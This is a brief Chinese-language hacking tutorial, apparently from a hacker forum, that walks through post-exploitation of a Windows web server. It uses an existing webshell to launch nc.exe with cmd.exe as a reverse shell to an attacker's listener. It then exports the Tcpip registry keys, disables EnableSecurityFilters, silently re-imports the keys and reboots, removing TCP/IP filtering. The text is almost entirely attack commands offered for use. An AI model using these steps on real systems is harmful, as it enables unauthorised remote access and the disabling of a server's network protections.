作者:河馬史詩 http://www.wrsky.com
1.用NC反彈得到一個shell
本機監聽 NC -l -p 32
WEBSHELL運行:
x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port"
得到一個shell
2.CMD下導出註冊表文件
C:/>regedit -e x:/xxx/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Ser
vices/Tcpip
C:/>regedit -e x:/xxx/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip
C:/>regedit -e x:/xxx/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
修改各文件 EnableSecurityFilters 處
將最後的1改爲0
3.將註冊表文件導入
x:/xxx>regedit -s 1.reg
x:/xxx>regedit -s 2.reg
x:/xxx>regedit -s 3.reg
-S 爲無提示
重啓命令 iisreset /reboot
完成TCP/IP篩選限制